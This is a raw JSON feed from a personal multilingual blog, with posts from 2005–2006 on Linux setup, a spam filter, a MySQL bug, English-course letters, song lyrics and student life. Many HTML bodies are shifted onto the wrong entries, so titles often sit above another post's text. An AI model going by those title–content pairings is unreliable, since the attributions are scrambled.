Configuring Exim4 and Courier IMAP under Debian GNU/Linux from Jason Boxman helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.
I can only recommend you this guide if you want to install Exim 4 on a Debian system.
", "url": "https://blog.x-way.org/Linux/2006/06/25/Configuring-Exim4-and-Courier-IMAP-under-Debian-GNULinux.html", "tags": ["Linux"], "date_published": "2006-06-25T21:18:46+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324087", "title": "Lordi Rules", "content_text": "It seems that Linus Torvalds also followed the Eurovision Song Contest. He called the new (fifth) release candidate of Linux 2.6.17 "Lordi Rules" which replaces the old name "Sliding Snow Leopard". (via git commit)", "content_html": "It seems that Linus Torvalds also followed the Eurovision Song Contest. He called the new (fifth) release candidate of Linux 2.6.17 "Lordi Rules" which replaces the old name "Sliding Snow Leopard". (via git commit)Amy Hoy has released a nice Scriptaculous Cheat Sheet just at the right moment since I'm going to use Scriptaculous for the redesign of actualites.epfl.ch.
", "url": "https://blog.x-way.org/Webdesign/2006/04/24/Scriptaculous-Cheat-Sheet.html", "tags": ["Webdesign"], "date_published": "2006-04-24T10:06:56+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324085", "title": "FĂŒnf Fragen ĂŒber Internet und Musik", "content_text": "Und wieder eine Ausgabe der freitĂ€glichen fĂŒnf, diesmal zum Thema Musik und Internet.Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)Angebote?Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosenMusikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzertoder ich bestelle sie bei cede.ch.Spielst du ein Instrument?Aktuell nicht mehr, aber frĂŒher habe ich Schlagzeug gespielt.Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einfluß auf diese Entwicklung?Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im Satellite schon eher :-)Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?Ja.Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere SchmuckstĂŒcke?Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.Eigentliche SchmuckstĂŒcke oder richtige RaritĂ€ten besitze ich nicht,aber diverse CDs sind signiert und mit einer Widmung versehen.", "content_html": "Und wieder eine Ausgabe der freitĂ€glichen fĂŒnf, diesmal zum Thema Musik und Internet.
Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)Angebote?
Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosenMusikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzertoder ich bestelle sie bei cede.ch.
Spielst du ein Instrument?
Aktuell nicht mehr, aber frĂŒher habe ich Schlagzeug gespielt.
Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einfluß auf diese Entwicklung?
Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.
Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im Satellite schon eher :-)
Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?
Ja.
Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere SchmuckstĂŒcke?
Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.
Eigentliche SchmuckstĂŒcke oder richtige RaritĂ€ten besitze ich nicht,aber diverse CDs sind signiert und mit einer Widmung versehen.
Linux wurde erfolgreich auf dem Intel-iMac gebootet! :-)
Mit Hilfe des EFI Linux Bootloaders elilo, eines modifizierten Kernels und eines gehackten Vesa-Framebuffer Treibers ist es dem Xbox-Linux Entwickler Edgar Hucek aka gimli gelungen den Linux Kernel und anschliessend auch Gentoo Linux auf einem 17-Zoll iMac mit Intel Core Duo Prozessor zum Laufen zu bringen.
Im Mactel-Linux Wiki finden sich schon ein paar Screenshots sowie die Ausgaben von dmesg und lspci.
Momentan konnte die graphische OberflÀche (aka X) noch nicht zum Starten gebracht werden. Anhand der Zeile
01:00.0 VGA compatible controller: ATI Technologies Inc Unknown device 71c5
in der Ausgabe von lspci vermute ich, dass die ATI Graphikkarte nichterkannt/unterstĂŒtzt wird und deshalb X noch nicht gestartet werdenkann. Aber wie vom Entwickler gesagt, ist Mactel-Linux vorerst nur eingrosser Hack, und es wird noch etwas Zeit benötigen bis Linux stabilauf den Intel Macs lĂ€uft.
Bei der Namenswahl hĂ€tten sich die Entwickler von mir aus lieberetwas anderes einfallen lassen können. 'Mactel' assoziere ich mitTelefon und nicht mit Computer. Aber daran werde ich mich wohl gewöhnenmĂŒssen, genauso wie an das unmögliche 'MacBook Pro'.
via symlink.ch
Update 18.02.06:
Mittlerweile existiert auch ein HOWTO und eine Memory Map des EFI. Der gehackte Vesa-Framebuffer Treiber funktioniert bis jetzt aber ausschliesslich mit dem 17-Zoll iMac.
", "url": "https://blog.x-way.org/Linux/2006/02/17/Mactel-Linux.html", "tags": ["Linux"], "date_published": "2006-02-17T09:57:58+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324083", "title": "CorrĂ©ctions des exercices du gĂ©nie logiciel", "content_text": "Voilà quelques images de la séance d'exercices du cours du génie logiciel.", "content_html": "Voilà quelques images de la séance d'exercices du cours du génie logiciel.
Nachdem ich es letzte Woche verpennt habe, gibt’s hier nun die beantworteten Fragen dieser Woche:
Schneiden wir mal ein heikles Thema an. Wie vertreibst Du Dir dieZeit auf dem Thron? Gibt’s Toilettenliteratur, die Tageszeitung, Musik?
Meistens hÀngen meine Gedanken bei irgendeiner Arbeit die ich gerade mache und so nutze ich die Zeit um neue Ideen zu sammeln.
Wenn Du jetzt aus dem nÀchstgelegenen Fenster schaust. Was stört Dich am ehesten?
Hm, weil’s Nacht ist sehe ich nicht sehr viel und von dem was ich sehe stört mich momentan eigentlich nichts.
Jetzt wird’s intim. Hast Du einen Fernseher im Schlafzimmer? Und warum hast Du dort (k)einen?
Ich habe gar keinen Fernseher.
In jedem dritten Weblog kann man ĂŒber Moleskines lesen. Jeneneckischen NotizbĂŒcher, die es in diverstesten Formen gibt. Wieorganisierst Du Dich? Machst Du schriftliche Notizen, oder reizt Du dennaturgegebenen Speicher voll aus. Wie vewaltest Du Deine Telefonnummernund Kontakte?
Meistens versuche ich alles im Kopf zu behalten, was auch ziemlich gutklappt. Telefonnummern sind im Handy gespeichert und E-Mail Adressen imAdressbuch vom E-Mail Programm. Postadressen hingegen nirgends, da ichsie nie brauche.
Has(s)t Du Stofftiere?
Ich habe ein Stofftier und zwar dieses hier.
Markus stellt fĂŒnf weihnachtliche Fragen:
- Und? Schon alle Geschenke gekauft? Auch schon verpackt?
- Hand auf’s Herz. Ist das Geschenkekaufen ein Pflichtprogramm oder gibst Du Dir MĂŒhe was “passendes” zu finden?
- Weihnachtendas Familienfest. Verbringst Du Weihnachten mit der Familie? AusTradition? Weil man sich sonst nie sieht? Wird’s Zoff geben? Oder istDir das alles zu spießig?
- Hast Du ĂŒberhaupt Lust aufWeihnachten? Oder versinkst Du lieber in eine Winterdepression oderergibst Du Dich an den ruhigen Tagen Deinem Weltschmerz?
- Urlaub?Na, zwischen den Feiertagen Urlaub genommen? Oder bist Du froh, wenn DuDich fern der Familie bei der Knechterei verstecken kannst?
Und hier meine Antworten:
", "url": "https://blog.x-way.org/Misc/2005/12/25/Fuenf-weihnachtliche-Fragen.html", "tags": ["Misc"], "date_published": "2005-12-25T18:03:01+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324080", "title": "Best Blonde Joke Ever", "content_text": "There is it, the best blonde joke ever.", "content_html": "
There is it, the best blonde joke ever.
", "url": "https://blog.x-way.org/Misc/2005/12/24/Best-Blonde-Joke-Ever.html", "tags": ["Misc"], "date_published": "2005-12-24T14:45:26+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324079", "title": "Schnee", "content_text": "Blick aus meinem Fenster, heute um 11:28 Uhr.Danach gings ab auf die Piste :-)", "content_html": "Blick aus meinem Fenster, heute um 11:28 Uhr.
Danach gings ab auf die Piste :-)
Da hier anscheinend doch machmal ein paar Benutzer mit dem InternetExplorer vorbeikommen habe ich nun doch noch das Layout so angepasst,dass es auch im Internet Explorer wie gewĂŒnscht aussieht (zudem soll jaeine potentielle Kundschaft nicht abgeschrecktwerden).
Eigentlich sind die Ănderungen am CSS nur ganz klein, aber umso schwerer herauszufinden *grrr*.
Als sehr hilfreich herausgestellt hat sich die parallele Installation verschiedener Internet Explorer Versionen. Dieser Artikel erklÀrt wie man eine solche Testumgebung erstellt.
Interessanterweise sah der unangepasste Stylesheet im Internet Explorer 4 bedeutend besser aus als im Internet Explorer 5, 5.5 oder 6.
", "url": "https://blog.x-way.org/Webdesign/2005/11/23/CSS4IE.html", "tags": ["Webdesign"], "date_published": "2005-11-23T01:21:59+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324077", "title": "FCE Formal Letter #1", "content_text": "Here's the letter we had to write for this week. In fact it's nottotaly written by myself because about 40% of the letter were alreadygiven and we just had to complete it.Since we had to do this letter for today, it's not yet corrected.Dear Mr Spiller,Thank you very much for your letter informing me that I have wonfirst prize in the competition. I am looking forward to going toAustralia and attending the course.I would like to do the course in August because in September my courses at the EPFL start.In the morning, I would like to join a grammar and vocabulary classbecause I asume my skills in these fields could use an improvement.Inthe afternoon, I would like to try making a class website because I wasalways fascinated by the possibilities of the internet and would liketo create a part of it on my own. I would also be interested in tryingto make a radio programme because I often listen to the radio and likeit a lot.Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?I look forward to hearing from you.Yours sincerely,Andreas Jaggi", "content_html": "Here's the letter we had to write for this week. In fact it's nottotaly written by myself because about 40% of the letter were alreadygiven and we just had to complete it.
Since we had to do this letter for today, it's not yet corrected.
", "url": "https://blog.x-way.org/School/2005/11/22/FCE-Formal-Letter-1.html", "tags": ["School"], "date_published": "2005-11-22T21:39:44+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324076", "title": "FCE Informal Letter #2", "content_text": "To continue what I started on Friday: here is the second letter Iwrote for the English course. I got back this letter last Thursday, soit comes already with the corrections, but I plan to publish the nextletters before I hand them in and to add the corrections afterwards.Dear Roman,You asked me for advice regarding next term. Here is the information I gathered for you.The course registration is on Monday 6 September and Tuesday 7September from 10.00 to 16.00. Register as early as possible becausethere are really muchmany people. There is always a big queue, but it is worth it.Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.At the bookshop they cost 50 pounds£50, but you can have mine for half price, great bargain!!.The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.On Wednesday evening there is a welcome party at 20.00 at Seven StartsHotel, it is always a great fun. Maybe we will meet there?See you thereYoursAndreas", "content_html": "Dear Mr Spiller,
Thank you very much for your letter informing me that I have wonfirst prize in the competition. I am looking forward to going toAustralia and attending the course.
I would like to do the course in August because in September my courses at the EPFL start.
In the morning, I would like to join a grammar and vocabulary classbecause I asume my skills in these fields could use an improvement.
Inthe afternoon, I would like to try making a class website because I wasalways fascinated by the possibilities of the internet and would liketo create a part of it on my own. I would also be interested in tryingto make a radio programme because I often listen to the radio and likeit a lot.Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?
I look forward to hearing from you.
Yours sincerely,
Andreas Jaggi
To continue what I started on Friday: here is the second letter Iwrote for the English course. I got back this letter last Thursday, soit comes already with the corrections, but I plan to publish the nextletters before I hand them in and to add the corrections afterwards.
", "url": "https://blog.x-way.org/School/2005/11/20/FCE-Informal-Letter-2.html", "tags": ["School"], "date_published": "2005-11-20T01:07:51+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324075", "title": "Kommentar Spam", "content_text": "Seit gestern haben hier die Spam-Kommentare massiv zugenommmen(sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehrĂŒber den ganzen Tag verteilt abgegeben sondern fast alle innerhalb dergleichen 5-10 Minuten.GlĂŒcklicherweise habe ich schon vor einiger Zeit meinen "naiven" Badword-Filter durch einen Bayes'schen Spamfilter ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.Aber es ist trotzdem Ă€rgerlich immer die als Spam markiertenKommentare zu löschen (momentant habe ich noch nicht genĂŒgend Vertrauenin den Filter als dass ich ihn die Spam-Kommentare automatisch löschenlasse).Da die Anzahl der hier vorhandenen Kommentare nicht gerade enormist, habe ich um den Spamfilter zu trainieren auch noch die Seitenmeines spamgeplagten Wikis hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfĂ€nglichen Schwierigkeiten (False-positives) problemlos.Dieses "Wundermittel gegen den Spam" habe ich nicht etwa selber entwickelt sondern ich habe einfach die Spam Filter Klasse von PHPClasses.org an meine BedĂŒrfnisse angepasst.Allen Spamgeplagten kann ich den Einsatz eines Bayes'schen Spamfilters sehr empfehlen!", "content_html": "Dear Roman,
You asked me for advice regarding next term. Here is the information I gathered for you.
The course registration is on Monday 6 September and Tuesday 7September from 10.00 to 16.00. Register as early as possible becausethere are really
muchmany people. There is always a big queue, but it is worth it.Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.
At the bookshop they cost50 pounds£50, but you can have mine for half price, great bargain!!.The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.
On Wednesday evening there is a welcome party at 20.00 at Seven StartsHotel, it is always a great fun. Maybe we will meet there?
See you there
Yours
Andreas
Seit gestern haben hier die Spam-Kommentare massiv zugenommmen(sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehrĂŒber den ganzen Tag verteilt abgegeben sondern fast alle innerhalb dergleichen 5-10 Minuten.
GlĂŒcklicherweise habe ich schon vor einiger Zeit meinen "naiven" Badword-Filter durch einen Bayes'schen Spamfilter ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.
Aber es ist trotzdem Ă€rgerlich immer die als Spam markiertenKommentare zu löschen (momentant habe ich noch nicht genĂŒgend Vertrauenin den Filter als dass ich ihn die Spam-Kommentare automatisch löschenlasse).
Da die Anzahl der hier vorhandenen Kommentare nicht gerade enormist, habe ich um den Spamfilter zu trainieren auch noch die Seitenmeines spamgeplagten Wikis hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfÀnglichen Schwierigkeiten (False-positives) problemlos.
Dieses "Wundermittel gegen den Spam" habe ich nicht etwa selber entwickelt sondern ich habe einfach die Spam Filter Klasse von PHPClasses.org an meine BedĂŒrfnisse angepasst.
Allen Spamgeplagten kann ich den Einsatz eines Bayes'schen Spamfilters sehr empfehlen!
Since I didn't have English courses for almost five years and since Iplan to do an exchange year in 2006/2007, I'm actually following anEnglish preparation course for the Cambridge First Certificate inEnglish (FCE) with the target to do the certificate in July 2006.
The course is hold at the language center of the EPFL and is also paid by the EPFL (only the course, not the certificate).
It seems that for the course I have to write a sample letter each week.I thought this would be a good oppurtunity to easily add some Englishcontent to this weblog and this way there are much more people who canfind mistakes and eventually give me some hints on how to improve mywriting skills :-)
There we go, here is the first letter we had to write, already with the corrections.
", "url": "https://blog.x-way.org/School/2005/11/17/FCE.html", "tags": ["School"], "date_published": "2005-11-17T23:39:12+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324073", "title": "CSS Reboot Fall 2005", "content_text": "Am Wochenende bin ich per Zufall auf die CSS Reboot Seite gestossen.Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte hier klicken um zum neuen zu wechseln.In Mozilla Firefox, Opera und Safari sieht die Seite ziemlich genau so aus wie gewĂŒnscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(", "content_html": "Dear Thomas,
LikeAs you probably know, I help at the "Satellite" and we're organizing a concert tomorrow.
It's a concertofwith two post-rock groups called "Rosqo" and "Beautiful Leopard"."Satellite" is located on the second floor of the "CM" building of the EPFL. The concert starts at eight o'clock and finishes around midnight.
It seems that the two groups are quite popular, so please tell me if you can come as
fastsoon as possible, so that I can reserve a ticket for you.Since you're coming from Luzern there aren't any trains
atafter midnight. But this isn't a problem, I'll organize a bed for you.If you're not too tired after the concert, we could go out to the city and visit some discos.
Hope you'll come to the concert.
Best wishes
Andreas
Am Wochenende bin ich per Zufall auf die CSS Reboot Seite gestossen.
Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)
Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte hier klicken um zum neuen zu wechseln.
In Mozilla Firefox, Opera und Safari sieht die Seite ziemlich genau so aus wie gewĂŒnscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(
", "url": "https://blog.x-way.org/Webdesign/2005/11/01/CSS-Reboot-Fall-2005.html", "tags": ["Webdesign"], "date_published": "2005-11-01T00:00:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324072", "title": "Lancer le bĂąton", "content_text": "Markus bewirft mich wegen den Französischkenntnissen mit Stöckchen!Allez dans vos archives.Retrouvez la 23e note ou celle proche de ce chiffre.Retrouvez la 5e phrase.Affichez le texte de la phrase ainsi que ces instructions.Demandez à 5 personnes que vous aimez lire d’en faire autant.Voilà, der fĂŒnfte Satz aus dem dreiundzwanzigsten Eintrag:Yeehaw!Das Stöckchen an fĂŒnf Personen weiterreichen, welche ich gerne lese?Mal schauen was die Linkliste so hergibt:AndreasPepinodeeGordonFlo", "content_html": "Markus bewirft mich wegen den Französischkenntnissen mit Stöckchen!
- Allez dans vos archives.
- Retrouvez la 23e note ou celle proche de ce chiffre.
- Retrouvez la 5e phrase.
- Affichez le texte de la phrase ainsi que ces instructions.
- Demandez à 5 personnes que vous aimez lire d’en faire autant.
Voilà, der fĂŒnfte Satz aus dem dreiundzwanzigsten Eintrag:
Yeehaw!
Das Stöckchen an fĂŒnf Personen weiterreichen, welche ich gerne lese?
Mal schauen was die Linkliste so hergibt:
Voilé quelques liens vers des démos d’AJAX.
Since this weblog received about 100 spam comments last week, i implemented a simple spam-filter based on a badwords list.
If a comments text contains more than four occurences of the followingwords, it won't get added and the user is redirected to the mainpage.
Thanks to very specific spam content, it only needs a small list of badwords to detect the spam.
This is just a simple anti-spam mechanism, but for now it works perfect and i hope it remains so for a long time :-)
", "url": "https://blog.x-way.org/Coding/2005/08/07/Fight-Spam.html", "tags": ["Coding"], "date_published": "2005-08-07T12:49:48+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324069", "title": "Les Landes 2005 - Teil 1", "content_text": "Um 20.30h fĂ€ngt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fĂ€hrt, reichts noch!Und so habe ich mir am Freitag vor zwei Wochen noch schnell Mr. & Mrs. Smithangeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,musste ich mich beeilen um noch meine Sachen zu packen damit wir umvier Uhr morgens in Richtung Frankreich losfahren konnten.Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes inMoustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibtsdiesmal sogar ein paar Bilder.Blick zur TĂŒr hinausLes Landes ist voller PinienPomme de pinEin GlĂŒhwĂŒrmchen photographiert mit Infrarotund mit BlitzlichtMond, Belichtungszeit 30 SekundenMond, Belichtungszeit 10 SekundenMond, Belichtungszeit 30 SekundenEine EidechseZwei EidechsenSpezieller GrashĂŒpferAuf dem RĂŒckweg ĂŒberquerten wir den Viaduc de MillauViaduc de MillauViaduc de MillauBrĂŒcke von Les VignesFelsformation bei Les VignesFerienlektĂŒre", "content_html": "Um 20.30h fĂ€ngt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fĂ€hrt, reichts noch!
Und so habe ich mir am Freitag vor zwei Wochen noch schnell Mr. & Mrs. Smithangeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,musste ich mich beeilen um noch meine Sachen zu packen damit wir umvier Uhr morgens in Richtung Frankreich losfahren konnten.Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes inMoustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibtsdiesmal sogar ein paar Bilder.
As an exercice for the algorithm test of next monday i implemented some algorithms in C.
There are:
The source code is available under the BSD License:
", "url": "https://blog.x-way.org/Coding/2005/07/02/Knapsack-01-and-sorting-algorithms.html", "tags": ["Coding"], "date_published": "2005-07-02T01:56:12+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324067", "title": "rl and rs", "content_text": "rl and rs are two small command-line programs written in C.rl removes starting line(s) from stdin.rs reverses it's input.The source code is available under the BSD License:rl.crs.c", "content_html": "rl
and rs
are two small command-line programs written in C.
rl
removes starting line(s) from stdin.rs
reverses it's input.The source code is available under the BSD License:
", "url": "https://blog.x-way.org/Coding/2005/06/30/rl-and-rs.html", "tags": ["Coding"], "date_published": "2005-06-30T22:01:55+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324066", "title": "linux-2.6.11.7-alubuttons.patch", "content_text": "Da gerade mein Kernel "geupdatet" wird, habe ich den Patch zur UnterstĂŒtzung der PowerBook Buttons an die aktuelle Kernelversion angepasst.Bei dieser Gelegenheit habe ich den neuen Patch an ein paarKernelentwickler geschickt, vielleicht schafft er's diesmal bis in den"offiziellen" Kernel.Update:Der Patch hat's bis zu Linus geschafft ([PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4), wird also in der nĂ€chsten Kernelversion dabei sein :-)", "content_html": "Da gerade mein Kernel "geupdatet" wird, habe ich den Patch zur UnterstĂŒtzung der PowerBook Buttons an die aktuelle Kernelversion angepasst.
Bei dieser Gelegenheit habe ich den neuen Patch an ein paarKernelentwickler geschickt, vielleicht schafft er's diesmal bis in den"offiziellen" Kernel.
Update:
Der Patch hat's bis zu Linus geschafft ([PATCH] macintosh/adbhid.c: adb buttons support for aluminium PowerBook G4), wird also in der nÀchsten Kernelversion dabei sein :-)
Heute habe ich beim Einkaufen diese 'Webcam' entdeckt. FĂŒr 29.90 CHF(~20€) bietet sie bis zu 30 640×480 Pixel grosse Bilder pro Sekunde.Mit dabei eine CD mit Treiber fĂŒr Windows 98 bis XP.
Als ich sie an mein Linux-PowerBook anschloss sagte mir dmesg
nur gerade diese zwei Zeilen:
ohci_hcd 0001:01:1b.0: remote wakeupusb 3-1: new full speed USB device using address 2
Von usbview wurde die Webcam auch nicht erkannt. Also super Voraussetzungen fĂŒr einen Betrieb mit Linux.
Nach etwas googeln fand ich spca50x.sf.net und das entsprechende 2.6er-Kernerlmodul. Erfreulicherweise ist das auch im Portage-Tree von Gentoo. Also schnell ein emerge spca5xx
. Ein modprobe spca5xx
lĂ€sst einige Fehlermeldungen erscheinen (Unresolved Symbols). Abhilfeschafft das Aktivieren der Video for Linux UnterstĂŒtzung im Kernel.Nach make
, make modules
und make modules_install
lÀdt das spca5xx Modul problemlos (eigentlich sollte man nach einemNeukompilieren des Kernels auch den neuen Kernel laden und nicht nurdie neuen Module!).
Ein chmod a+rx /dev/video0
als root
behebt Berechtigunsprobleme, welche beim Zugriff als normaler Benutzer auftreten können.
Fazit:
Bisher wurden die EintrÀge der Indexseite mit diesem SQL-Statement abgefragt:
SELECT w.*, a.nick AS nick, cat.name AS categoryname, count(c.id) AS comments, l.name AS languagename, l.code AS lc FROM `x-log_weblog` AS w, `x-log_authors` AS a, `x-log_languages` AS l, `x-log_categories` AS cat LEFT JOIN `x-log_comments` AS c ON w.id = c.posting WHERE a.id = w.author AND cat.id = w.category AND w.date <= NOW() AND w.public = '1' AND w.language & l.id > 0 GROUP BY w.id ORDER BY w.date DESC
Doch seit Hostpoint auf MySQL 4.1.10a umgestellt hat, stimmt die Anzahl der Kommentare nicht mehr.
Nach diversen erfolglosen Versuchen die LEFT JOIN
Anweisung zu Àndern, habe ich in einem Bugreport eine Lösung gefunden:
count(DISTINCT c.id)
Mangels spezifischer Kenntnisse kann ich nicht beurteilen ob das nunein Bug oder ein Feature ist. Aber da mehrere Bugreports dazuexistieren scheint es eher ein Bug zu sein.
", "url": "https://blog.x-way.org/Coding/2005/04/01/Bug-in-MySQL-4-1-10a.html", "tags": ["Coding"], "date_published": "2005-04-01T22:01:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324062", "title": "Lang – Kurz", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2005/04/01/Lang-Kurz.html", "tags": ["Misc"], "date_published": "2005-04-01T00:33:47+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324061", "title": "Samael – On Earth", "content_text": "Before we could talkWe were singingBefore we could runWe were dancingLife is shortBut not a day is lostThe world goes round and roundAnd we go on and on…Beijing to AmsterdamBerlin to Buenos AiresSydney to L.A.Rio to AbidjanStockholm to AthenaDublin to GuatemalaLondon to BrasiliaMadrid to PhiladelphiaParis to San FranciscoDetroit to WarszawaMoscow to MexicoOslo to New DehliHelsinki to New OrleansVienna to AnkaraRoma to LisboaOn earth, we’re allDancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understandDancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understandWide World!Our World!New York to TokyoMelbourne to BudapestPrague to JaipurShangai to MontrealVancouver to SingaporeSofia to JohannesburgHong Kong to St. PetersburgOn earth, we’re allDancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understandDancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understandWide World!Wide World!Our World!Dancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understandDancing with the hidden tribeLearning to move and flyTouching the sky with our handsLonging to love to understand", "content_html": "Before we could talk
We were singing
Before we could run
We were dancing
Life is short
But not a day is lost
The world goes round and round
And we go on and on…
Beijing to Amsterdam
Berlin to Buenos Aires
Sydney to L.A.
Rio to Abidjan
Stockholm to Athena
Dublin to Guatemala
London to Brasilia
Madrid to Philadelphia
Paris to San Francisco
Detroit to Warszawa
Moscow to Mexico
Oslo to New Dehli
Helsinki to New Orleans
Vienna to Ankara
Roma to Lisboa
On earth, we’re all
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
Wide World!
Our World!
New York to Tokyo
Melbourne to Budapest
Prague to Jaipur
Shangai to Montreal
Vancouver to Singapore
Sofia to Johannesburg
Hong Kong to St. Petersburg
On earth, we’re all
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
Wide World!
Wide World!
Our World!
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
Dancing with the hidden tribe
Learning to move and fly
Touching the sky with our hands
Longing to love to understand
A month ago or so, someone spammed my Wiki with asian links. This overwrote all my data because PhikiWikidoesn't have a backup-mechanism or a versioning system. Since i had abackup of the webserver, i could restore the Wiki. But i didn't want torestore manually the backup via FTP each time someone overwrites myData.
So i built a versioning system based on rcs
. I've searched the write and read functions in the code and added just an co
before the read function and a ci
before the write function.
Now each time someone changes a document, it's stored as a newversion of the document. The different versions are made accesible bythe r=
GET-parameter (example: version 1.38 and 1.50 of FrontPage).
If now someone fills my Wiki with spam, i can just load the last goodversion and store it as the new version. No need to replay a backup viaFTP.
The syntax of PhikiWiki doesn't have enough features for my needs, so i decided to use Markdown instead. I just removed all the formatting stuff of phiki and added a simple Markdown($txt);
call.
Wie immer in den Ferien bastle ich ein bisschen an meinem Weblog rum.
Dem allgemeinen Trend folgend, werden hier nun auch Gravatare unterstĂŒtzt (Das sind die kleinen Bildchen, welche anhand der E-Mail Adresse angezeigt werden. Beispiel). Wer noch keinen hat, einfach bei gravatar.com die E-Mail Adresse registrieren, Bild hinaufladen fertig :-)
Seit Anfang dieses Jahres gibt es hier nebst deutschen und französischen Inhalten auch noch englische BeitrÀge. Bei den Einstellungen, kann man sich eine beliebige Kombination zusammenmixen.
Das Admininterface habe ich mit Hilfe von xmlHTTPRequest um einen JavaScript TrackBackClient erweitert.
Leider erlaubt Mozilla keine xmlHTTPRequests auf eineandere als die eigene Domain, was die Nutzung sehr einschrÀnkt. Abervielleicht folgt Mozilla in Zukunft dem Beispiel von Safari und erlaubtGET-Requests auf beliebige Domains.
Hier je me suis levé à 5.30h après 5 heures de sommeil pour prendrele train de 6.43 en direction Renens. Avec le TSOL je suis arrivé àl'EPFL pour faire cette merde d'éxamen informatique théorique III.
À midi j'ai mangé avec mes copains et puis on est allé à Sat: Pichet. Pichet. Pichet. Pichet. Pichet. Pichet. Pichet.
Ensuite j'ai dîné chez un copain avant d'aller au Planète bleue ou on acontinue la fête de fin des éxamens avec pas mal de Vodka.
Après minuit on est allé au Jaggers. Vers 4 heures on est sortie du Jaggers et ceux qui habitent en ville se sont couchés.
Mais mois et un copain qui n'habite pas en ville, nous sommes marchés à Sat car il n'y a pas de TSOL à cette heure.
Vers 5 heures on y est arrivé. Heureusement Sat était ouvert toute la nuit.
Puis je suis retourné à Vufflens-la-Ville avec le TSOL et le train après 7 heures.
À 7.30h je me suis enfin couché, après 26 heures sans sommeil dont 19 de la fête.
